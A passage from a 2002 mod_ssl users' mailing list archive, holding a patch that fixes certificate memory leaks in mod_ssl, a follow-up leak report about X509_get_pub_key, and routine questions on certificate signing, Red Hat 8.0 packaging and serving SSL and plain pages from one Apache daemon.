leaks in the order of megabytes *per Apache process*. In fact, researching
this bug was started when one of our machines went down (swapping like mad)
after as little as one minute of very heavy test load.

The solution to this bug is to appropriately call X509_free every time the
code gets the certificate object and is done with it. This is what the patch
below does.


Notes:
------

The following patch also includes changes that I wrote about a couple of days
ago. They change free() calls to OPENSSL_free() where necessary in mod_ssl.
A quick reminder: memory returned by OpenSSL functions like X509_NAME_oneline
is allocated by OPENSSL_malloc, and should be freed with OPENSSL_free, not
with free(). This caused me a lot of problems when trying to debug this
memory leak (because OPENSSL_malloc and OPENSSL_free calls did not match up),
so I think it would be good to clean this up once and for all.

One note about reproducing this leak: By default, mod_ssl does not make
any attempts to disable OpenSSL's internal session cache (we discussed
this a bit on this list a few days ago), which is huge (20,000-sessions long)
by default. In this case, the session object for the first 20,000 sessions
in a certain Apache process are deliberately not freed, and obviously the
peer certificate (if any) inside them aren't freed as well.
Only when one lowers the size of this internal cache (with
SSL_CTX_sess_set_cache_size()) or disables it completely (the upcoming
SSL_SESS_CACHE_NO_INTERNAL option to SSL_CTX_set_session_cache_mode()),
one notices how all the certificates never got freed anyway.

With this patch, and with internal session cache disabled, Apache processes
will not grow at all, not even after numerous client-authenticated requests.

The patch itself:
-----------------

diff -ur mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_ext.c mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_ext.c
--- mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_ext.c	2002-03-27 18:47:58.000000000 +0200
+++ mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_ext.c	2002-10-25 17:15:22.000000000 +0200
@@ -624,7 +624,7 @@
         ssl_log(s, SSL_LOG_DEBUG,
                 "SSL Proxy: (%s) no acceptable CA list, sending %s", 
                 servername, cp != NULL ? cp : "-unknown-");
-        free(cp);
+        OPENSSL_free(cp);
         /* export structures to the caller */
         *x509 = xi->x509;
         *pkey = xi->x_pkey->dec_pkey;
@@ -643,7 +643,7 @@
                 cp = X509_NAME_oneline(X509_get_subject_name(xi->x509), NULL, 0);
                 ssl_log(s, SSL_LOG_DEBUG, "SSL Proxy: (%s) sending %s", 
                         servername, cp != NULL ? cp : "-unknown-");
-                free(cp);
+                OPENSSL_free(cp);
                 /* export structures to the caller */
                 *x509 = xi->x509;
                 *pkey = xi->x_pkey->dec_pkey;
@@ -717,8 +717,8 @@
             servername, peer != NULL ? peer : "-unknown-",
             errdepth, cp != NULL ? cp : "-unknown-", 
             cp2 != NULL ? cp2 : "-unknown");
-    free(cp);
-    free(cp2);
+    OPENSSL_free(cp);
+    OPENSSL_free(cp2);
 
     /*
      * If we already know it's not ok, log the real reason
diff -ur mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_kernel.c mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_kernel.c
--- mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_kernel.c	2002-10-04 16:30:37.000000000 +0300
+++ mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_kernel.c	2002-10-25 17:33:14.000000000 +0200
@@ -386,7 +386,8 @@
         if ((xs = SSL_get_peer_certificate(ssl)) != NULL) {
             cp = X509_NAME_oneline(X509_get_subject_name(xs), NULL, 0);
             ap_ctx_set(fb->ctx, "ssl::client::dn", ap_pstrdup(conn->pool, cp));
-            free(cp);
+            OPENSSL_free(cp);
+            X509_free(xs);
         }
 
         /*
@@ -865,11 +866,12 @@
                 /* optimization */
                 if (   dc->nOptions & SSL_OPT_OPTRENEGOTIATE
                     && nVerifyOld == SSL_VERIFY_NONE
-                    && SSL_get_peer_certificate(ssl) != NULL)
+                    && (cert = SSL_get_peer_certificate(ssl)) != NULL)
                     renegotiate_quick = TRUE;
                 ssl_log(r->server, SSL_LOG_TRACE,
                         "Changed client verification type will force %srenegotiation",
                         renegotiate_quick ? "quick " : "");
+                        X509_free(cert);
              }
         }
     }
@@ -1029,7 +1031,8 @@
             cp = X509_NAME_oneline(X509_get_subject_name(cert), NULL, 0);
             ap_ctx_set(r->connection->client->ctx, "ssl::client::dn", 
                        ap_pstrdup(r->connection->pool, cp));
-            free(cp);
+            OPENSSL_free(cp);
+            X509_free(cert);
         }
 
         /*
@@ -1042,12 +1045,15 @@
                         "Re-negotiation handshake failed: Client verification failed");
                 return FORBIDDEN;
             }
+            cert = NULL;
             if (   dc->nVerifyClient == SSL_CVERIFY_REQUIRE
-                && SSL_get_peer_certificate(ssl) == NULL   ) {
+                && (cert = SSL_get_peer_certificate(ssl)) == NULL   ) {
                 ssl_log(r->server, SSL_LOG_ERROR,
                         "Re-negotiation handshake failed: Client certificate missing");
                 return FORBIDDEN;
             }
+            if (cert != NULL)
+                X509_free(cert);
         }
     }
 
@@ -1498,9 +1504,9 @@
             errdepth, cp != NULL ? cp : "-unknown-",
             cp2 != NULL ? cp2 : "-unknown");
     if (cp)
-        free(cp);
+        OPENSSL_free(cp);
     if (cp2)
-        free(cp2);
+        OPENSSL_free(cp2);
 
     /*
      * Check for optionally acceptable non-verifiable issuer situation
@@ -1655,7 +1661,7 @@
             BIO_free(bio);
             cp2 = X509_NAME_oneline(subject, NULL, 0);
             ssl_log(s, SSL_LOG_TRACE, "CA CRL: Issuer: %s, %s", cp2, cp);
-            free(cp2);
+            OPENSSL_free(cp2);
             free(cp);
         }
 
@@ -1719,7 +1725,7 @@
                         "Certificate with serial %ld (0x%lX) "
                         "revoked per CRL from issuer %s",
                         serial, serial, cp);
-                free(cp);
+                OPENSSL_free(cp);
 
                 X509_STORE_CTX_set_error(ctx, X509_V_ERR_CERT_REVOKED);
                 X509_OBJECT_free_contents(&obj);
diff -ur mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_vars.c mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_vars.c
--- mod_ssl-2.8.11-1.3.27-dist/pkg.sslmod/ssl_engine_vars.c	2002-06-29 10:42:45.000000000 +0300
+++ mod_ssl-2.8.11-1.3.27/pkg.sslmod/ssl_engine_vars.c	2002-10-25 17:33:40.000000000 +0200
@@ -314,8 +314,10 @@
         result = ssl_var_lookup_ssl_cert_verify(p, c);
     }
     else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "CLIENT_", 7)) {
-        if ((xs = SSL_get_peer_certificate(ssl)) != NULL)
+        if ((xs = SSL_get_peer_certificate(ssl)) != NULL) {
             result = ssl_var_lookup_ssl_cert(p, xs, var+7);
+            X509_free(xs);
+        }
     }
     else if (ssl != NULL && strlen(var) > 7 && strcEQn(var, "SERVER_", 7)) {
         if ((xs = SSL_get_certificate(ssl)) != NULL)
@@ -352,7 +354,7 @@
         xsname = X509_get_subject_name(xs);
         cp = X509_NAME_oneline(xsname, NULL, 0);
         result = ap_pstrdup(p, cp);
-        free(cp);
+        OPENSSL_free(cp);
         resdup = FALSE;
     }
     else if (strlen(var) > 5 && strcEQn(var, "S_DN_", 5)) {
@@ -364,7 +366,7 @@
         xsname = X509_get_issuer_name(xs);
         cp = X509_NAME_oneline(xsname, NULL, 0);
         result = ap_pstrdup(p, cp);
-        free(cp);
+        OPENSSL_free(cp);
         resdup = FALSE;
     }
     else if (strlen(var) > 5 && strcEQn(var, "I_DN_", 5)) {
@@ -543,6 +545,8 @@
     else
         /* client verification failed */
         result = ap_psprintf(p, "FAILED:%s", verr);
+    if(xs != NULL)
+	X509_free(xs);
     return result;
 }
 


-- 
Nadav Har'El                        |     Friday, Oct 25 2002, 20 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |In Fortran, God is real unless declared
http://nadav.harel.org.il           |an integer.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat Oct 26 21:45:12 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA29028; Sat, 26 Oct 2002 21:44:27 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.solcon.nl id VAA29022; Sat, 26 Oct 2002 21:43:28 +0200 (MET DST)
Received: from stichting-eljakim.nl (en-51161.solcon.nl [212.45.51.161])
	by mail.solcon.nl (8.12.5/pre1.0-MySQL/8.12.5) with ESMTP id g9QJbUbT020793
	for ; Sat, 26 Oct 2002 21:37:31 +0200
Message-ID: <3DBAF028.9040106@stichting-eljakim.nl>
Date: Sat, 26 Oct 2002 21:42:32 +0200
From: "Arno Kruit (Stichting Eljakim)" 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.2a) Gecko/20020910
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: sign certificaat error
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
X-RAVMilter-Version: 8.4.1(snapshot 20020919) (mail.solcon.nl)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Arno Kruit (Stichting Eljakim)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

HI,

I am a beginner with modssl en I have a problem.
If i will sign a certificaat with ./sign.sh server.csr then i got the 
following error mesagge:

1 out of 1 certificate requests certified, commit? [y/n]y
Write out database with 1 new entries
Data Base Updated
CA verifying: server.crt <-> CA cert
server.crt: /C=NL/ST=Some-State/L=Rotterdam/O=Stichting 
Eljakim/OU=Exacto 
2.0/CN=www.exacto.eljakim/Email=akruit@stichting-eljakim.nl
error 18 at 0 depth lookup:self signed certificate
/C=NL/ST=Some-State/L=Rotterdam/O=Stichting Eljakim/OU=Exacto 
2.0/CN=www.exacto.eljakim/Email=akruit@stichting-eljakim.nl
error 7 at 0 depth lookup:certificate signature failure

What I'm doing wrong?

Thanks for support

Arno Kruit



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sun Oct 27 11:37:04 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA18929; Sun, 27 Oct 2002 11:36:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id LAA18923; Sun, 27 Oct 2002 11:35:18 +0100 (MET)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9RAZDiX008250;
	Sun, 27 Oct 2002 12:35:13 +0200 (IST)
Received: (from rl@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9RAZCMW008249;
	Sun, 27 Oct 2002 12:35:12 +0200 (IST)
Date: Sun, 27 Oct 2002 12:35:12 +0200
From: "Zvi Har'El" 
To: modssl-users@modssl.org
Cc: "Nadav Har'El" 
Subject: X509_get_pub_key - yet another memory leak in mod_ssl
Message-ID: <20021027103512.GE29339@fermat.math.technion.ac.il>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.4i
Hebrew-Date: 21 Heshvan 5763
X-PGP-Public-Key: http://www.math.technion.ac.il/~rl/pubkey.html
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Zvi Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

In our constant search for memory leakes in the last two weeks, I found another
memory leak in mod_ssl, this time in ssl_callback_SSLVerify_CRL (file
ssl_engine_kernel.c). This function, among other things, verifies the signature
on the CRL. To do that, it invokes X509_get_pub_key on the certificate, and
uses the return value to call X509_CRL_verify. However, it neglects to free the
publick key. There is no manual page for X509_get_pub_key (at least not one I
could find), but a quick grep on openssl sources reveales the fact that each
invocation of X509_get_pub_key is *always* followed by an invocation of
EVP_PKEY_FREE on the returned object.  However, in mod_ssl, the obeject is not
freed. I would like to mention, that now that I am writing this e-mail, I
grepped the mod_ssl sources, and found two more invocations of
X509_get_pub_key, again without free. One is in the function
ssl_init_ConfigureServer, in ssl_engine_init.c, when the code "optionally
copies DSA parameters for certificate from private key", and in the function
ssl_util_algotypeof, in ssl_util.c. I think this leak (multiplied by 3),
requires your attantion.

Best,

Zvi.

-- 
Dr. Zvi Har'El     mailto:rl@math.technion.ac.il     Department of Mathematics
tel:+972-54-227607                   Technion - Israel Institute of Technology
fax:+972-4-8324654 http://www.math.technion.ac.il/~rl/     Haifa 32000, ISRAEL
"If you can't say somethin' nice, don't say nothin' at all." -- Thumper (1942)
                             Sunday, 21 Heshvan 5763, 27 October 2002, 12:18PM
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 11:15:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA25917; Mon, 28 Oct 2002 11:14:46 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA25836; Mon, 28 Oct 2002 11:13:32 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g9SACm624576
	for ; Mon, 28 Oct 2002 10:13:11 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 28 Oct 2002 10:12:43 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F223E@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: mod_ssl-2.0.40-8
Date: Mon, 28 Oct 2002 10:12:38 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

You'll find the source RPM on the source CD for Red Hat 8.0. Install it as
any normal package (eg rpm -ivh), and you'll find the spec file that built
the binary in /usr/src/redhat/SPECS.

As Geoff points out, it is unusual that Red Hat 8.0 uses a separate package
name, but Red Hat have been doing this since version 7.0. With version 8.0,
the "apache" package name disappears and is called "httpd" instead. I guess
they are synchronising the names of the packages to match the daemon names,
although I haven't yet checked to see if "bind" has become "named".

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Theories of evolution are like buses - there'll be another one along in a
minute

> -----Original Message-----
> From: Mike Pacheco [mailto:mike@fwdsystems.com]
> Sent: 25 October 2002 18:30
> To: modssl-users@modssl.org
> Subject: mod_ssl-2.0.40-8
> 
> 
> Hi All,
> 
> Been on the mod_ssl site from top to bottom and I can not 
> find mod_ssl for
> apache 2.0.40 - I do a custom install of RedHat 8.0 - pick 
> httpd and mod_ssl
> and then query the installed packages after it finishes and I 
> test apache
> with ssl successfully and I get:
> 
> rpm -q mod_ssl = mod_ssl-2.0.40-8
> 
> I would like to get my hands on the source for this version 
> of mod_ssl for
> some custom install options but I can not seem to find it.  
> Can somebody
> please point me in the right direction?
> 
> Thanks
> 
> Mike Pacheco
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 11:28:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA26618; Mon, 28 Oct 2002 11:27:25 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from fermat.math.technion.ac.il id LAA26539; Mon, 28 Oct 2002 11:26:24 +0100 (MET)
Received: from fermat.math.technion.ac.il (localhost [127.0.0.1])
	by fermat.math.technion.ac.il (8.12.1/8.12.1) with ESMTP id g9SAQMiX023331
	for ; Mon, 28 Oct 2002 12:26:23 +0200 (IST)
Received: (from nyh@localhost)
	by fermat.math.technion.ac.il (8.12.1/8.12.1/Submit) id g9SAQMPw023330
	for modssl-users@modssl.org; Mon, 28 Oct 2002 12:26:22 +0200 (IST)
Date: Mon, 28 Oct 2002 12:26:22 +0200
From: "Nadav Har'El" 
To: modssl-users@modssl.org
Subject: Re: mod_ssl-2.0.40-8
Message-ID: <20021028102622.GA23210@fermat.math.technion.ac.il>
References: <9B66BBD37D5DD411B8CE00508B69700F033F223E@pborolocal.rnib.org.uk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F223E@pborolocal.rnib.org.uk>
User-Agent: Mutt/1.4i
Hebrew-Date: 22 Heshvan 5763
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Nadav Har'El" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Mon, Oct 28, 2002, John.Airey@rnib.org.uk wrote about "RE: mod_ssl-2.0.40-8":
> the "apache" package name disappears and is called "httpd" instead. I guess
> they are synchronising the names of the packages to match the daemon names,
> although I haven't yet checked to see if "bind" has become "named".

No, it hasn't, and remind "bind" (bind-9.2.1-9).

I think they wanted a different name when they switched from Apache 1 to
Apache 2.
By the way, considering Apache 2's site is "http://httpd.apache.org/",
I guess the choice of name "httpd" could be understood. But I was also
quite suprised when I first saw this name in Redhat 8.

-- 
Nadav Har'El                        |     Monday, Oct 28 2002, 22 Heshvan 5763
nyh@math.technion.ac.il             |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |Long periods of drought are always
http://nadav.harel.org.il           |followed by rain.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 11:40:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id LAA26997; Mon, 28 Oct 2002 11:39:15 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from maggotts.rnib.org.uk id LAA26989; Mon, 28 Oct 2002 11:38:36 +0100 (MET)
From: John.Airey@rnib.org.uk
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g9SAbe626243
	for ; Mon, 28 Oct 2002 10:38:11 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 28 Oct 2002 10:37:36 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F223F@pborolocal.rnib.org.uk>
To: modssl-users@modssl.org
Subject: RE: mod_ssl-2.0.40-8
Date: Mon, 28 Oct 2002 10:37:32 -0000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I wasn't just surprised, I was confused. I was looking all over for the
apache package!

I've only had a brief dabble into 8.0, but will have to consider it if and
when our apache servers start to get any heavier load. My last attempt at
Apache 2.0 ended in disaster regardless of whether I used an RPM or compiled
it myself, so hopefully version 8.0 does what I haven't managed yet.

Thanks for the information.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

Theories of evolution are like buses - there'll be another one along in a
minute


> -----Original Message-----
> From: Nadav Har'El [mailto:nyh@math.technion.ac.il]
> Sent: 28 October 2002 10:26
> To: modssl-users@modssl.org
> Subject: Re: mod_ssl-2.0.40-8
> 
> 
> On Mon, Oct 28, 2002, John.Airey@rnib.org.uk wrote about "RE: 
> mod_ssl-2.0.40-8":
> > the "apache" package name disappears and is called "httpd" 
> instead. I guess
> > they are synchronising the names of the packages to match 
> the daemon names,
> > although I haven't yet checked to see if "bind" has become "named".
> 
> No, it hasn't, and remind "bind" (bind-9.2.1-9).
> 
> I think they wanted a different name when they switched from 
> Apache 1 to
> Apache 2.
> By the way, considering Apache 2's site is "http://httpd.apache.org/",
> I guess the choice of name "httpd" could be understood. But I was also
> quite suprised when I first saw this name in Redhat 8.
> 
> -- 
> Nadav Har'El                        |     Monday, Oct 28 
> 2002, 22 Heshvan 5763
> nyh@math.technion.ac.il             
> |-----------------------------------------
> Phone: +972-53-245868, ICQ 13349191 |Long periods of drought 
> are always
> http://nadav.harel.org.il           |followed by rain.
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 17:42:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA07736; Mon, 28 Oct 2002 17:41:09 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id RAA07722; Mon, 28 Oct 2002 17:40:41 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 01B9A4CE765; Mon, 28 Oct 2002 17:40:40 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 562DE286B0; Mon, 28 Oct 2002 17:39:45 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from cnrit.tamu.edu id RAA06551; Mon, 28 Oct 2002 17:02:29 +0100 (MET)
Received: from cnrit.tamu.edu (texag [128.194.122.98])
	by cnrit.tamu.edu (8.12.1/8.12.1) with ESMTP id g9SFvP94025453
	for ; Mon, 28 Oct 2002 09:57:26 -0600 (CST)
Message-ID: <3DBD5F8A.3070202@cnrit.tamu.edu>
Date: Mon, 28 Oct 2002 10:02:18 -0600
From: Mike Smith 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020823 Netscape/7.0
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: How to run SSL and Non-SSL pages with same daemon...
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mike Smith 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello,

    I am upgrading to the Apache Httpd 2.0 web server from 1.3.x and 
cannot find any Apache-SSL package, so I'm assuming that SSL support is 
now only done through mod_ssl in httpd-2.0.  I compiled it with openssl 
support and it appears ready to go, but I've got a question.  I've got 
both secure and non-secure pages that I want to serve up with this web 
server...how do I do that with 2.0?  Currently, I run two separate 
daemons...httpd and httpsd each with separate config files, 
DocumentRoot's, etc.  How do I serve up both SSL and non-SSL pages with 
the same server daemon?  I want them to have separate DocumentRoot's too 
so that my web-based mail users can just type /mail, 
instead of /secure/mail.  How can I assign certain 
directories to be picked up by mod_ssl while others are just 
non-encrypted pages?  Also, I saw that with the 1.3.x chain of httpd 
servers, I could use mod_jk to get my server to send requests for 
certain directories to the Jakarta Tomcat container, but I don't see 
this functionality anymore in 2.0!  I need this server to also be smart 
about which pages are JSP or Java Servlets and therefore get redirected 
to my Tomcat package.

HELP?!?!  I've been fumbling around the Apache documentation for weeks 
now and can't find any direction on this!


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 17:59:20 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA08356; Mon, 28 Oct 2002 17:58:13 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from th01.opsion.fr id RAA08346; Mon, 28 Oct 2002 17:57:18 +0100 (MET)
Received: from 212.180.95.194 [212.180.95.194] by th01.opsion.fr id 200210281655.3aa3; Mon, 28 Oct 2002 16:55:58 GMT
Message-ID: <3DBD6BE1.9010703@ifrance.com>
Date: Mon, 28 Oct 2002 17:54:57 +0100
From: Estrade Matthieu 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.1) Gecko/20020830
X-Accept-Language: fr-fr, en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: How to run SSL and Non-SSL pages with same daemon...
References: <3DBD5F8A.3070202@cnrit.tamu.edu>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Estrade Matthieu 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

maybe let your httpd for your non-ssl pages, and do a virtualhost on 
port 443 to handle ssl pages
or one Vhost for port 80 and one Vhost for 443


Mike Smith wrote:

> Hello,
>
>    I am upgrading to the Apache Httpd 2.0 web server from 1.3.x and 
> cannot find any Apache-SSL package, so I'm assuming that SSL support 
> is now only done through mod_ssl in httpd-2.0.  I compiled it with 
> openssl support and it appears ready to go, but I've got a question.  
> I've got both secure and non-secure pages that I want to serve up with 
> this web server...how do I do that with 2.0?  Currently, I run two 
> separate daemons...httpd and httpsd each with separate config files, 
> DocumentRoot's, etc.  How do I serve up both SSL and non-SSL pages 
> with the same server daemon?  I want them to have separate 
> DocumentRoot's too so that my web-based mail users can just type 
> /mail, instead of /secure/mail.  How can I 
> assign certain directories to be picked up by mod_ssl while others are 
> just non-encrypted pages?  Also, I saw that with the 1.3.x chain of 
> httpd servers, I could use mod_jk to get my server to send requests 
> for certain directories to the Jakarta Tomcat container, but I don't 
> see this functionality anymore in 2.0!  I need this server to also be 
> smart about which pages are JSP or Java Servlets and therefore get 
> redirected to my Tomcat package.
>
> HELP?!?!  I've been fumbling around the Apache documentation for weeks 
> now and can't find any direction on this!
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> ___________________________________________________________________
> Haut Débit: Modem offert soit 150,92 euros remboursés sur le Pack 
> eXtense de Wanadoo !
> Profitez du Haut Débit à partir de 30 euros/mois : 
> http://www.ifrance.com/_reloc/w
>



___________________________________________________________________
Haut Débit: Modem offert soit 150,92 euros remboursés sur le Pack eXtense de Wanadoo !
Profitez du Haut Débit à partir de 30 euros/mois : http://www.ifrance.com/_reloc/w

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 19:29:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA10998; Mon, 28 Oct 2002 19:28:10 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id TAA10973; Mon, 28 Oct 2002 19:27:19 +0100 (MET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Mon, 28 Oct 2002 10:26:10 -0800
Received: from 156.153.254.10 by lw3fd.law3.hotmail.msn.com with HTTP;
	Mon, 28 Oct 2002 18:26:10 GMT
X-Originating-IP: [156.153.254.10]
From: "Edward Wong" 
To: modssl-users@modssl.org
Subject: shm support for Itanium
Date: Mon, 28 Oct 2002 10:26:10 -0800
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
